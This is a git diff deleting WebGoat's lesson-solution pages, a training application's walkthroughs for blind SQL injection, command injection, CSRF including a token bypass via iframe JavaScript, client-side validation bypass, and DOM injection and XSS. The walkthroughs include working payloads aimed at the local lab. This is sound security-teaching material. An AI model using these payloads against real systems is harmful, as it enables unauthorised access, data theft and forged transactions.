Concept / -Topic To Teach:

- -

Basic -Authentication is used to protect server side resources. The web server will send -a 401 authentication request with the response for the requested resource. The -client side browser will then prompt the user for a user name and password -using a browser supplied dialog box. The browser will base64 encode the user -name and password and send those credentials back to the web server. The web -server will then validate the credentials and return the requested resource if -the credentials are correct.

- -

These -credentials are automatically resent for each page protected with this -mechanism without requiring the user to enter their credentials again.

- -

 

- -

General -Goal(s):

- -

For this -lesson, your goal is to understand Basic Authentication and answer the -questions below.

- -

 

- -

- -

Figure 1 Lesson 13

- -

 

- -

To learn the -name of the authentication header you must click “Submit” and intercept the -request with WebScarab.

- -

 

- -

- -

Figure 2 Intercepted request

- -

 

- -

The HTTP -header that contains the Basic Authentication information is called -"Authorization". This value Z3Vlc3Q6Z3Vlc3Q= is Base64 encoded. You can decode -this by using WebScarab > Tools > Transcoder.

- -

 

- -

- -

Figure 3 WebScarabs Transcoder

- -

 

- -

Click Base64 -decode.

- -

 

- -

- -

Figure 4 Decode value

- -

 

- -

These values must -be used to complete the questions.

- -

 

- -

- -

Figure 5 Answers

- -

 

- -

 

- -

- -

Figure 6 Part 1 completed

- -

 

- -

For this -lesson it is very important that you understand how the JSESSIONID cookie is -used for session management and how the basic authorization header is used for -authentication.

- -

- -

 

- -

When WebGoat -is able to retrieve a valid session you are automatically redirected to the -lesson you are working on. When there is no valid session, WebGoat will create -a new JSESSIONID and you will see the first lesson, HTTP Basics.

- -

 

- -

When there is -no session cookie, WebGoat will first verify if you already authenticated. If -not, you will get a pop-up window from the browser that requests your user name -and password (guest/guest). After the user credentials are validated, you will -access the Start-page of WebGoat and WebGoat will create a new JSESSIONID for -this session.

- -

 

- -

To access -WebGoat as the user basic, you need to corrupt the existing JSESSIONID and the -Authorization header. You can do this in WebScarab. Intercept the request and -delete a character from the JSESSIONID value and the Authorization header.

- -

WebGoat will -require you to authenticate, so you now enter for the user name basic and for -the password basic. This logs you on as the user basic.

- -

 

- -

Remember our -JSESSIONID? This JSESSIONID is a non-persistent cookie which is set during our -first visit. Every request from the browser to WebGoat will have this cookie -value. Corrupting this value in the previous request will not change the cookie -value stored in browser memory and that is the reason why the old JSESSIONID -cookie is sent in every request.

- -

 

- -

- -

Figure 7 Basic Authentication

- -

 

- -

You clearly -see that the JSESSIONID is the same like in the previous request, but the -Authorization header now contains the Base 64 encoded value of basic:basic (you -can decode this value in WebScarab > Tools > Transcoder).

- -

- -

Figure 8 Logged on as user basic

- -

 

- -

 

- -

Because of the -valid JSESSIONID, WebGoat retrieves the authenticated user via the server-side -session object using getSession().getUser(). To make WebGoat believe that you -are authenticated as basic, you need to corrupt the JSESSIONID, as shown in the -screenshot below.

- -

 

- -

- -

Figure 9 Corrupt JSESSIONID

- -

 

- -

 

- -

- -

Figure 10 Start page for user basic

- -

 

- -

Now you are -redirected to the WebGoat start page. The JSESSIONID is changed and you lost all -your green stars because the basic user hasn’t completed any lesson. Go to the -lesson "Basic Authentication" to complete this lesson.

- -

 

- -

- -

Figure 11 Lesson 13 Completed

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/BlindNumericSqlInjection.html b/src/main/webapp/lesson_solutions_1/BlindNumericSqlInjection.html
deleted file mode 100644
index 45eb33e58..000000000
--- a/src/main/webapp/lesson_solutions_1/BlindNumericSqlInjection.html
+++ /dev/null
@@ -1,46 +0,0 @@
- - - - -Solution: Blind Numeric SQL Injection - - - -

Lesson Plan Title: Blind Numeric SQL Injection

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. -

-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-

- -

General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
- -The goal is to find the value of the field pin in table pins for the row with the cc_number of 1111222233334444. The field is of type int, which is an integer.
- -Put the discovered pin value in the form to pass the lesson. -

- -Solution:

-In this lesson, the only output returned by the webpage is whether a given account exists or not. Therefore, we cannot simply request the pin number for this account.
-We can take advantage of the query being used, however. The database query being used is:
-SELECT * FROM user_data WHERE userid=accountNumber;

-If this query returns information for the account, the page will indicate the account exists. However, if the userid doesnt exist, no data is returned and the page says the account is invalid. -By using the AND function, we can add additional conditions to this query. If the additional condition is true, the result will be a valid account, if not the page will indicate the account is invalid.
-For example, try entering these two commands for the account ID:
-101 AND 1=1 and 101 AND 1=2

-In the first statement, both conditions return true. Account 101 is found and 1=1, so the page indicates the account is valid.
-In the second statement, only the first condition is true. Account 101 is found but 1 does not equal 2, so the page indicates the account is invalid.

-Now, we can use a more complicated command for our second true/false statement. The following statement will tell us if the pin is above or below 10000:
-101 AND ((SELECT pin FROM pins WHERE cc_number='1111222233334444') > 10000 );

-If our command returns false, it makes the entire statement false and returns and invalid account, which indicates the pin number is below 10000. If it is above 10000, the opposite is true.

-The last step is to repeatedly use this command with a different number to the right of the > operator until we can determine the pin number.
-The pin number is 2364. Enter this number to complete the lesson. - - - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html b/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html
deleted file mode 100644
index 844892b9d..000000000
--- a/src/main/webapp/lesson_solutions_1/BlindStringSqlInjection.html
+++ /dev/null
@@ -1,42 +0,0 @@
- - - - -Solution: Blind String SQL Injection - - - -

Lesson Plan Title: Blind String SQL Injection

- -

Concept / Topic To Teach:
-SQL injection attacks represent a serious threat to any database-driven site. The methods behind an attack are easy to learn and the damage caused can range from considerable to complete system compromise. Despite these risks, an incredible number of systems on the internet are susceptible to this form of attack. -

-Not only is it a threat easily instigated, it is also a threat that, with a little common-sense and forethought, can easily be prevented.
-
-It is always good practice to sanitize all input data, especially data that will used in OS command, scripts, and database queries, even if the threat of SQL injection has been prevented in some other manner.
-
-

- -

General Goal(s):
-The form below allows a user to enter an account number and determine if it is valid or not. Use this form to develop a true / false test check other entries in the database.
- -The goal is to find the value of the field name in table pins for the row with the cc_number of 4321432143214321. The field is of type varchar, which is a string.
- -Put the discovered name in the form to pass the lesson. Only the discovered name should be put into the form field, paying close attention to the spelling and capitalization.
-

- -Solution:

-This lesson is conceptually very similar to the previous lesson. The big difference is we are searching for a string, not a number.
-We will attempt to figure out the name the same way, by injecting a boolean expression into the pre-scripted SQL query. It looks similar to the one from the previous lesson:
-101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 1, 1) < 'H' );

-We can compare characters the same way we can compare numbers. For example, N > M. However, without the SUBSTRING method, we are attempting to compare the entire string to one letter, which doesn't help us. The substring method has the following syntax:
-SUBSTRING(STRING,START,LENGTH)

-The expression above compares the first letter to H. It will return false and show invalid account number. Changing the boolean expression to < 'L' returns true, so we know the letter is between H and L. With a few more queries, we can determine the first letter is J. Note that capitalization matters, and it's right to assume the first letter is capitalized.

-To determine the second letter, we have to change the SUBSTRING parameters to compare against the second letter. We can use this command:
-101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='4321432143214321'), 2, 1) < 'h' );

-Using several more queries, we can determine the second letter is i. Note that we are comparing the second character to a lowercase h. Continue this process until you have the rest of the letters. -The name is Jill. Enter this name to complete the lesson. Capitalization matters. - - - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html b/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html deleted file mode 100644 index a0a7d4a84..000000000 --- a/src/main/webapp/lesson_solutions_1/BypassHtmlFieldRestrictions.html +++ /dev/null @@ -1,37 +0,0 @@ - - - - -Solution: Bypass HTML Field Restrictions - - - -

Lesson Plan Title: Bypass HTML Field Restrictions

- -

Concept / Topic To Teach:
-Client-side validation should not be considered a secure means of validating parameters. These validations only help reduce the amount of server processing time for normal users who do not know the format of required input. Attackers can bypass these mechanisms easily in various ways. Any client-side validation should be duplicated on the server side. This will greatly reduce the likelihood of insecure parameter values being used in the application -

- -

General Goal(s):
-The user should be able send the website input that it wasn't expecting.
-For this exercise, your job is to break the client side validation and send the website input that it wasn't expecting, including input for the disabled field. You must break all 6 validators at the same time. -

- -Solution:

-To solve this lesson, we need to put invalid characters (slashes, quotes, etc.) into all six fields. Since three of the fields are toggles or dropdowns, we will need to intercept the request with Webscarab.
-We still need to put invalid data in the disabled field, however. There are two ways of accomplishing this; we can enable the field using Firebug, or we can insert an additional field using Webscarab.

- -To enable the field, open Firebug and find the form containing all of our fields. Find the text input named "disabledinput". Delete the disabled="" parameter. This causes the field on the page to be unlocked, and will also cause the disabledinput variable to appear in Webscarab.
-
-Enabled input after removing the "disabled" parameter in Firebug.

-The other option is to add another variable when intercepting the request with Webscarab. When the intercept request window pops up, use the insert button to add a new variable called disabledinput.

-Either way you add the input, the next step is to invalidate all of the responses. Put any symbol or character that isn't allowed in for each variable. Make sure you put more than five characters in the field that is limited by length.
- -
-Correctly filled in request with all fields invalidated and the disabledinput variable added.

- -Submit the request to complete the lesson. -
- - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CSRF.html b/src/main/webapp/lesson_solutions_1/CSRF.html
deleted file mode 100644
index db3af3e8b..000000000
--- a/src/main/webapp/lesson_solutions_1/CSRF.html
+++ /dev/null
@@ -1,869 +0,0 @@
- - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform Cross Site Request Forgery.

- -

 

- -

Concept -/ Topic To Teach:

- -

This -lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks.

- -

 

- -

How -the attacks works:

- -

Cross-Site -Request Forgery (CSRF/XSRF) is an attack that tricks the victim into loading a -page that contains img links like the one below:

- -

<img -src="http://www.mybank.com/sendFunds.do?acctId=123456"/>

- -

When -the victim's browser attempts to render this page, it will issue a request to -www.mybank.com to the transferFunds.do page with the specified parameters. The -browser will think the link is to get an image, even though it actually is a -funds transfer function. The request will include any cookies associated with -the site. Therefore, if the user has authenticated to the site, and has either -a permanent cookie or even a current session cookie, the site will have no way -to distinguish this from a legitimate user request. In this way, the attacker -can make the victim perform actions that they didn't intend to, such as logout, -purchase item, or any other function provided by the vulnerable website

- -

 

- -

General -Goal(s):

- -

Your -goal is to send an email to a newsgroup that contains an image whose URL is -pointing to a malicious request. Try to include a 1x1 pixel image that includes -a URL. The URL should point to the CSRF lesson with an extra parameter -"transferFunds=4000". You can copy the shortcut from the left hand -menu by right clicking on the left hand menu and choosing copy shortcut. -Whoever receives this email and happens to be authenticated at that time will -have his funds transferred. When you think the attack is successful, refresh -the page and you will find the green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values.

- -

 

- -

- -

Figure 1 How to perform CSRF

- -

 

- -

Solution:

- -

 

- -

To -complete this lesson you need to embed HTML code in the message box. This HTML -code should contain a image tag linking to an URL that is not a real image  will but start a transaction on the web -server instead.

- -

 

- -

The -format of an image in html is <img src="[URL]" width="1" -height="1" />

- -

The transaction can be triggered by an URL to the -current lesson and an extra parameter "transferFunds" and the amount. The -width=1 and height=1 will not show the image.

- -

 

- -

This payload will work:

- -

<img -src="http://localhostattack?Screen=81&menu=210&transferFunds=5000" -width="1" height="1" />

- -

 

- -

So create a new message with title "Test" and a -message with the payload.

- -

- -

Figure 2 Insert payload

- -

 

- -

The page will refresh and you will see a new message -in the message list.

- -

 

- -

- -

Figure 3 New message test

- -

 

- -

Click -on the message test. This will download the message and display the contents as -HTML, executing the payload. Examine the HTTP Request in WebScarab that is -generated when the browers tries to render the image tag.

- -

 

- -

- -

Figure 4 CSRF attack

- -

 

- -

Now -you need to refresh the page to get the green star next to the lesson.

- -

 

- -

- -

Figure 5 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/ClientSideFiltering.html b/src/main/webapp/lesson_solutions_1/ClientSideFiltering.html
deleted file mode 100644
index fe08a4bdf..000000000
--- a/src/main/webapp/lesson_solutions_1/ClientSideFiltering.html
+++ /dev/null
@@ -1,84 +0,0 @@
- - - - -Client Side Filtering - - - -

Lesson Plan Title: Client Side Filtering

- -

Concept / Topic To Teach:
-It is always a good practice to send to the client -only information which they are supposed to have access to. -In this lesson, too much information is being sent to the -client, creating a serious access control problem. -

- -

General Goal(s):
-For this exercise, your mission is exploit the extraneous -information being returned by the server to discover information -to which you should not have access. -

- -Solution:
-

-This Lab consists of two Stages. In the first Stage you have to -get sensitive information . In the second one you have to fix the problem.
-

-Stage 1 -

-Use Firebug to solve this stage. If you are using IE you can try it with -IEWatch.

- -First use any person from the list and see what you get. After doing this you -can search for a specific person in Firebug. Make sure you find the hidden table with -the information, including the salary and so on. In the same table you will find -Neville. - -Clientside Filtering
-Inspect HTML on Firebug - -

-Now write the salary into the text edit box and submit your answer! -

-Stage 2 -

-In this stage you have to modify the clientSideFiltering.jsp which you will find under -the WebContent in the lessons/Ajax folder. The Problem is that -the server sends all information to the client. As you could see -even if it is hidden it is easy to find the sensitive date. In this -stage you will add a filter to the XPath queries. In this file you will find -following construct:

- - StringBuffer sb = new StringBuffer();
- - sb.append("/Employees/Employee/UserID | ");
- sb.append("/Employees/Employee/FirstName | ");
- sb.append("/Employees/Employee/LastName | ");
- sb.append("/Employees/Employee/SSN | ");
- sb.append("/Employees/Employee/Salary ");
- - String expression = sb.toString();
-
-

-This string will be used for the XPath query. You have to guarantee that a manger only -can see employees which are working for him. To archive this you can use -filters in XPath. Following code will exactly do this:

- - StringBuffer sb = new StringBuffer();
- - sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/UserID | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/FirstName | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/LastName | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/SSN | ");
- sb.append("/Employees/Employee[Managers/Manager/text() = " + userId + "]/Salary ");
- - String expression = sb.toString();
-
-

-Now only information is sent to your client you are authorized for. You can click on the button. -

- - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/ClientSideValidation.html b/src/main/webapp/lesson_solutions_1/ClientSideValidation.html
deleted file mode 100644
index b23fb0875..000000000
--- a/src/main/webapp/lesson_solutions_1/ClientSideValidation.html
+++ /dev/null
@@ -1,64 +0,0 @@
- - - - -Insecure Client Storage - - - -

Lesson Plan Title: Insecure Client Storage

- -

Concept / Topic To Teach:
-It is always a good practice to validate all input - on the server side. Leaving the mechanism for validation - on the client side leaves it vulnerable to reverse engineering. - Remember, anything on the client side should not be considered a secret.

- - - -

General Goal(s):
-For this exercise, your mission is to discover a coupon -code to receive an unintended discount. Then, exploit the use -of client side validation to submit an order with a cost of zero.

- -

Solution:
-For the solution you need a plugin for your browser, which is capable of debugging -Javascript. For IE you can use IEWatch. This solution is written for Firebug -which is a plugin for Firefox. -

- -Stage 1 -

-First we want to try to get a coupon code to get something cheaper. Open -Firebug and click on the Script Tab. Make sure you choose clientSideValidation.js -on the dropdown list. Toggle a breakpoint on the line:
-decrypted = decrypt(coupons[i]);

-Now enter a character in the coupon code field. The Javascript gets executed -but stops at the breakpoint. On the right side you see the parameters -and there values. Now use the step over symbol or F10. Now you can read -the clear text of decrypted: -

-Stage 1 -
-Figure 1 Firebug in action - -

-Now that you know the coupon name enter it in the coupon field, purchase something -and you are done. -

- -Stage 2 -

-You can not edit the Prices in the Shopping Cart. The reason is that the readonly -attribute is set for this field. -

-

To get rid of this attribute open Firebug. Make sure this time you use -the HTML View. You can directly in -Firebug search for readonly and elemenate this attribute.The field for the total is -called GRANDTOT. After having deleted the readonly attribute from GRANDTOT -it is possible to change the price directly in the browser. Select any products -you like, change the total field to 0 and hit the purchase button.

- - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CommandInjection.html b/src/main/webapp/lesson_solutions_1/CommandInjection.html
deleted file mode 100644
index 7e19dd78a..000000000
--- a/src/main/webapp/lesson_solutions_1/CommandInjection.html
+++ /dev/null
@@ -1,739 +0,0 @@
- - - - - - - -Solution: Command Injection - - - - - - - - - - - - -
- -

Lesson Plan Title: How to Perform Command Injection

- -

 

- -

Concept / Topic To Teach:

- -

Command -injection attacks represent a serious threat to any parameter-driven site. The methods -behind an attack are easy to learn and the damage caused can range from -considerable to complete system compromise. Despite these risks an incredible -number of systems on the internet are susceptible to this form of attack.

- -

 

- -

Not only is -it a threat easily instigated, it is also a threat that, with a little -common-sense and forethought, can be almost totally prevented. This lesson will -show the student several examples of parameter injection.

- -

 

- -

It is always -good practice to sanitize all input data, especially data that will used in OS -command, scripts, and database queries.

- -

 

- -

General Goal(s):

- -

The user -should be able to execute any command on the hosting OS.

- -

 

- -

- -

Figure 1 Lesson 16

- -

 

- -

Solution:

- -

 

- -

Select a -lesson from the drop-down box and click on "View".

- -

 

- -

- -

 

- -

Intercept the -request with WebScarab when you click on "View". Append " & netstat -an -& ipconfig to the HelpFile parameter. Do not forget the double quote!

- -

 

- -

- -

Figure 2 Injecting command netstat & ipconfig

- -

 

- -

The result -contains the output of the command netstat and ipconfig.

- -

 

- -

- -

Figure 3 Command Injection results

- -

 

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - -
diff --git a/src/main/webapp/lesson_solutions_1/ConcurrencyCart.html b/src/main/webapp/lesson_solutions_1/ConcurrencyCart.html
deleted file mode 100644
index 2c19a9918..000000000
--- a/src/main/webapp/lesson_solutions_1/ConcurrencyCart.html
+++ /dev/null
@@ -1,32 +0,0 @@
- - - - -Shopping Cart Concurrency Flaw - - - -

Lesson Plan Title: Shopping Cart Concurrency Flaw

- -

Concept / Topic To Teach:
-Web applications can handle many HTTP requests simultaneously. Developers often use variables that are not thread safe.  Thread safety means that the fields of an object or class always maintain a valid state when used concurrently by multiple threads. It is often possible to exploit a concurrency bug by loading the same page as another user at the exact same time. Because all threads share the same method area, and the method area is where all class variables are stored, multiple threads can attempt to use the same class variables concurrently.
-

- -

General Goal(s):
-For this exercise, your mission is to exploit the concurrency issue which will allow you to purchase merchandise for a lower price. -

- -Solution:

-1. Open a new browser window on the same page.

-2. In window A you choose a low cost item and click "Purchase".

-
-Window A


-3. In window B you choose the a high cost item you want to buy and click "update cart". The variable of the price has been overwritten now.

-
-Window B


-4. In window A you can click click "Confirm" and you bought your item for a lower price.

-
-Window A Success
-


- -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html b/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html
deleted file mode 100644
index caeeedb03..000000000
--- a/src/main/webapp/lesson_solutions_1/CsrfPromptByPass.html
+++ /dev/null
@@ -1,110 +0,0 @@
- - - - -Client Side Filtering - - - -

Lesson Plan Title:Prompt By-Pass with CSRF

- -

Concept / Topic To Teach:
-This lesson teaches how to perform Cross Site Request Forgery (CSRF) attacks containing -multiple requests to by-pass a scriptable user-prompt -

- -

General Goal(s):
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains multiple -malicious requests: the first to transfer funds, and the second a request to confirm the prompt -that the first request triggered. The URL should point to this lesson with an extra -parameter "transferFunds=4000", and "transferFunds=CONFIRM". You can copy the shortcut from the -left hand menu by right clicking on the left hand menu and choosing copy shortcut. Whoever -receives this email and happens to be authenticated at that time will have his funds transferred. -When you think the attack is successful, refresh the page and you will find the green check on -the left hand side menu
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values. -

- -Solution:
- -

Start by crafting an image or iframe tag similar to the CSRF LAB: <img -src="http://localhostattack?Screen=81&menu=210&transferFunds=5000" -width="1" height="1" /> - -This image request will not result in a transfer of funds but will instead -prompt the user for confirmation. To see the confirmation prompt, try typing in the URL of the -Lesson with the extra parameter of "transferFunds=4000"
- -User Prompt for confirmation of the transfer of funds
-User Prompt -

-

-Next look at the source of the page to see what parameters the confirmation requires. -The form in the confirmation prompt looks like the following: - - -

<form accept-charset='UNKNOWN' method='POST' action='attack?Screen=5&menu=900' enctype='application/x-www-form-urlencoded'>
-	<input name='transferFunds' type='submit' value='CONFIRM'>
-	<input name='transferFunds' type='submit' value='CANCEL'>
-</form>
- -From this we see the next forged command will need the folllowing URL:
-attack?Screen=5&menu=900&transferFunds=CONFIRM
-This solution shows how to do this attack with both iframes and images. The next step is to -add the additional forged confirmation request. However, an additional iframe or image with -this URL will not be sufficient. The second request must load after the first. So add -Javascript to load the second command after the first. For iframes, make the onload attribute -of the first frame set the src of the second iframe:
- - -
<iframe
-	src="http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=400"
-	id="myFrame" frameborder="1" marginwidth="0"
-	marginheight="0" width="800" scrolling=yes height="300"
-	onload="document.getElementById('frame2').src='http://localhost:8080/WebGoat/attack?Screen=5&menu=900&transferFunds=CONFIRM';">
-
</iframe>
-	
-<iframe
-	id="frame2" frameborder="1" marginwidth="0"
-	marginheight="0" width="800" scrolling=yes height="300">
-</iframe>
-
-
- -Next add the iframes into a message stored on the web page:
-Picture of embedded message
-Insert iframes hack picture
-

-The following shows the result of clicking on the malicious iframe message: -Picture of the malicious iframe message
-Results of iframes hack picture
-In the above image, note that the first frame shows the user prompt, the result of the -first forged request to transfer funds. In the second frame the results of the second -forged request (the confirmation) are shown, indicating that 4000 dollars were successfully -transfered. Refreshing the page will indicate that this lesson has been completed. -

-

-In a real attack these results would be hidden from the end user. Click "restart this lesson" -to attempt the attack again, only this time try hiding the attack with hidden or very small frames. -

-

-For images, loading an html page as an image will cause an error. So instead of using the onload attribute, use onerror: -
- -<img -src="http://localhostattack?Screen=81&menu=210&transferFunds=5000" -onerror="document.getElementById('image2').src='http://localhostattack?Screen=81&menu=210&transferFunds=CONFIRM'" -width="1" height="1" /> -<img -id="image2" -width="1" height="1" /> - -
-Next store the malicious images in a message and click the message to attempt the attack. -Picture of the malicious iframe message
-Picture of adding malicious image requests
-Refreshing the page should indicate that this lesson has been completed. Congratulations. One way for developers to limit -CSRF attacks is to only allow requests to be issued via HTTP Post. That would remove any attacks by images or iframes, but -not for XmlHttpRequests in Javascript. For extra credit, you could try the same attack but instead use XmlHttpRequest over post. - -
\ No newline at end of file
diff --git a/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html b/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html
deleted file mode 100644
index 1b66f2d72..000000000
--- a/src/main/webapp/lesson_solutions_1/CsrfTokenByPass.html
+++ /dev/null
@@ -1,122 +0,0 @@
- - - - -CSRF Token By-Pass - - - -

Lesson Plan Title:CSRF Token Prompt By-Pass

- -

Concept / Topic To Teach:
-This lesson teaches how to perform CSRF attacks on sites that use tokens to mitigate CSRF attacks, but are vulnerable to CSS attacks. -

- -

-Cross-Site Request Forgery (CSRF/XSRF) is an attack that tricks the victim into -loading a page that contains a 'forged request' to execute commands with the -victim's credentials.

- -

Token-based request authentication deters these attacks. This technique -inserts tokens into pages that issue requests. These tokens are required to -complete a request, and help verify that requests are not scripted. CSRFGuard from OWASP uses -this technique to help prevent CSRF attacks.

- -

However, this technique can be by-passed if CSS vulnerabilities exist on the same site. -Because of the same-origin browser policy, pages from the same domain can read content from -other pages from the same domain.

- -

General Goal(s):
-Similar to the CSRF Lesson, your goal is to send an email to a newsgroup that contains a malicious -request to transfer funds. To successfully complete you need to obtain a valid request token. The -URL that presents the transfer funds form is the same as the CSRF lesson with an extra parameter -"transferFunds=main". Load this page, read the token and append the token in a forged request -to transferFunds. When you think the attack is successful, refresh the page and you will find the -green check on the left hand side menu.
-Note that the "Screen" and "menu" GET variables will vary between WebGoat builds. Copying the menu link on the left will give you the current values. -

- -Solution:
- -

Similar to the CSRF LAB, you must forge a request that will transfer funds. However, -a request will not result in a transfer of funds unless it has a correct token. To find -a valid token, you could look at the form that the site generates to submit a transfer of funds. -To see the transfer funds page, try typing in the URL of the Lesson with the extra parameter -of "transferFunds=main"
- -Picture of transfer initiation form
-Transfer initiation form -

-

-Next look at the source of the page to see what parameter the token comes in. - -

<form accept-charset='UNKNOWN' id='transferForm' method='POST' action='attack?Screen=2&menu=900' enctype='application/x-www-form-urlencoded'>
-	<input name='transferFunds' type='text' value='0'>
-	<input name='CSRFToken' type='hidden' value='1745740650'>
-	<input type='submit'>
-
</form>
- -From this we see a forged command will need the CSRFToken parameter.
- -

This solution loads this page in an iframe and reads the token out of the frame. -Note that this is possible because the message originates from the same domain and -does not violate the "same origin policy". So even thought this page has taken -measures to prevent CSRF attacks, those measures can be side-stepped because of -CSS vulnerabilites. To pull out the CSRFToken, the following javascript locates the -frame, then the form, then saves the token

- -
-var tokenvalue;
-
-function readFrame1()
-{
-    var frameDoc = document.getElementById("frame1").contentDocument;
-    var form = frameDoc.getElementsByTagName("form")[1];
-    var token = form.CSRFToken.value;
-    tokenvalue = '&CSRFToken='+token;
-    
-    loadFrame2();
-}
-
-function loadFrame2()
-{
-    var testFrame = document.getElementById("frame2");
-    testFrame.src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=4000"+tokenvalue;	
-}
-
- -

readFrame1 will read the frame's content for the CSRFToken, save it and then call loadFrame2 -LoadFrame2 will then append the token and load a second frame.

- -The following frames loads the transfer page in the first frame. When it finishes loading, it will -call readFrame1, which calls loadFrame2, which then sets the src for the second iframe. - -
- - - -
<iframe	src="http://localhost:8080/WebGoat/attack?Screen=212&menu=900&transferFunds=main"
-	onload="readFrame1();"
-	id="frame1" frameborder="1" marginwidth="0"
-	marginheight="0" width="800" scrolling=yes height="300"></iframe>
-<iframe id="frame2" frameborder="1" marginwidth="0"
-	marginheight="0" width="800" scrolling=yes height="300"></iframe>
-
-
- -

The next picture shows inserting this code into a message:
-Picture of inserting CSRF code in web page
-Inserting CSRF code into message

- -The following picture shows the results of someone hitting this page. Note that no effort was taken to -hide the results of the two frames. The first frame shows the transfer funds form, and the second shows -the results of the CSRF attack. Try another post that will hide these iframes from being noticed. -

The next picture shows inserting this code into a message:
-Picture of the results of viewing the malicious message
-Results of viewing the malicious message - - -

- - - \ No newline at end of file diff --git a/src/main/webapp/lesson_solutions_1/DOMInjection.html b/src/main/webapp/lesson_solutions_1/DOMInjection.html deleted file mode 100644 index 1e73150f0..000000000 --- a/src/main/webapp/lesson_solutions_1/DOMInjection.html +++ /dev/null @@ -1,865 +0,0 @@ - - - - - - - - - - - - - - - - - - - -
- -

Lesson -Plan Title: How to -Perform DOM Injection Attack.

- -

 

- -

Concept / -Topic To Teach:

- -

How to -perform DOM injection attacks.

- -

 

- -

How the -attacks works:

- -

Some applications -specially the ones that uses AJAX manipulates and updates the DOM directly -using JavaScript, DHTML and eval() method.
-An attacker may take advantage of that by intercepting the reply and try to -inject some javascript commands to exploit his attacks.

- -

 

- -

General -Goal(s):

- -

* -Your victim is a system that takes an activation key to allow you to use it.
-* Your goal should be to try to get to enable the activate button.
-* Take some time to see the HTML source in order to understand how the key -validation process works.

- -

 

- -

- -

Figure 1 AJAX Security - DOM Injection

- -

 

- -

Solution:

- -

 

- -

AJAX requires -XML communication between the browser and the web application. When you view -the source of the HTML page, you will notice the usage of XMLHttpRequest:

- -

 

- -

<script>

- -

function -validate() {

- -

var keyField -= document.getElementById('key');

- -

var url = -'attack?Screen=80&menu=1150&from=ajax&key=' + -encodeURIComponent(keyField.value);

- -

if (typeof -XMLHttpRequest != 'undefined') {

- -

req -= new XMLHttpRequest();

- -

} else if -(window.ActiveXObject) {

- -

req -= new ActiveXObject('Microsoft.XMLHTTP');

- -

   }

- -

   req.open('GET', url, true);

- -

   req.onreadystatechange = callback;

- -

   req.send(null);

- -

}

- -

function -callback() {

- -

    if (req.readyState == 4) {

- -

        if (req.status == 200) {

- -

            var message = req.responseText;

- -

                                     eval(message);

- -

        }}}

- -

</script>

- -

 

- -

The XML -response contains JavaScript that will activate the button so that you are able -to click on it. This requires you to inject JavaScript to manipulate the -Document Object Model of the HTML page in the browser. This requires -intercepting the HTTP response in WebScarab!

- -

 

- -

Enter a -license key (for example 'a') and intercept the HTTP Request and HTTP Response -in WebScarab.

- -

 

- -

- -

Figure 2 HTTP Request

- -

 

- -

- -

Figure 3 HTTP Response

- -

 

- -

Intercept the -reply and replace the body with document.form.SUBMIT.disabled = false;

- -

 

- -

- -

Figure 4 Updated HTTP Response

- -

 

- -

The button “Activate!” is now enabled!

- -

 

- -

- -

Figure 5 Activate! Button is enabled

- -

 

- -

- -

Figure 6 Lesson completed

- -

 

- -
- - - - - -
- Solution by Erwin Geirnaert - ZION SECURITY
- - - - diff --git a/src/main/webapp/lesson_solutions_1/DOMXSS.html b/src/main/webapp/lesson_solutions_1/DOMXSS.html deleted file mode 100644 index 2cfa4d90d..000000000 --- a/src/main/webapp/lesson_solutions_1/DOMXSS.html +++ /dev/null @@ -1,51 +0,0 @@ - - - - -DOM Based Cross Site Scripting (XSS) - - - -

Lesson Plan Title: DOM Based Cross Site Scripting (XSS)

- -

Concept / Topic To Teach:
-The Document Object Model (DOM) presents an interesting problem from a security standpoint. It allows the content of a web page to be dynamically modified, but that can be abused by attackers during a malicious code injection. XSS, a type of malicious code injection, can occur when unvalidated user input is used directly to modify the content of a page on the client side.
-

- -

General Goal(s):
-For this exercise, your mission is to use this vulnerability to inject malicious code into the DOM. Then in the last stage, you will correct the flaws in the code to address the vulnerability. -

- -Solution:

-Stage 1: Enter "<IMG SRC="images/logos/owasp.jpg"/>" and submit the solution.

-
-Stage 1 result


